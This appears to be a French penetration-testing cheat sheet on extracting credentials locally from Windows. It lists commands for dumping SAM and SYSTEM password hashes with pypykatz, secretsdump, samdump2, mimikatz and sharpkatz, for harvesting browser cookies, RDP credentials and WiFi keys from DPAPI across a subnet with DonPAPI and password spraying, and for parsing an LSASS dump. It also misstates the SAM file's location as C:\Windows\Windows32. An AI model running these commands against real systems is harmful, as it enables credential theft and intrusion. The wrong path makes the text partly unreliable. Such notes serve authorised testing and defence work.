Extraction local
Base SAM
La base SAM se situe dans C:\Windows\Windows32. Si l’utilisateur est en mesure d’extraire les fichiers SAM et SYSTEM, il est possible d’extraire les hashes de mot de passe.
pypykatz registry --sam SAM SYSTEM
secretsdump.py -sam SAM -system SYSTEM LOCAL
samdump2 SYSTEM SAM > hashes.txt
mimikatz
privilege::debug
token::elevate
lsadump::sam
sharpkatz.exe --Command logonpasswords
DPAPI
DonPAPI
DonPAPI est un outil permettant de dumper rapidement des identifiants ou données stockées dans la DPAPI. Il permet entre autres de récupérer les outils suivants:
- Identifiants et cookies navigateur (firefox, chrome, edge, etc.)
- Identifiants RDP
- Base de données mRemoteNG
- Clés WiFi
L’avantage est que l’outil s’exécute sur une plage IP et permet de scanner rapidement un sous-réseau via du password spraying
Installation
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
python3 -m pip install -r requirements.txt
python3 DonPAPI.py
Usage
DonPAPI domain/user:password@target
La target peut être une IP ou un sous-réseau.
L’outil propose aussi d’utiliser les techniques de pass-the-hash ou pass-the-ticket.
LSASS
Pypykatz
pypykatz lsa minidump lsass.dmp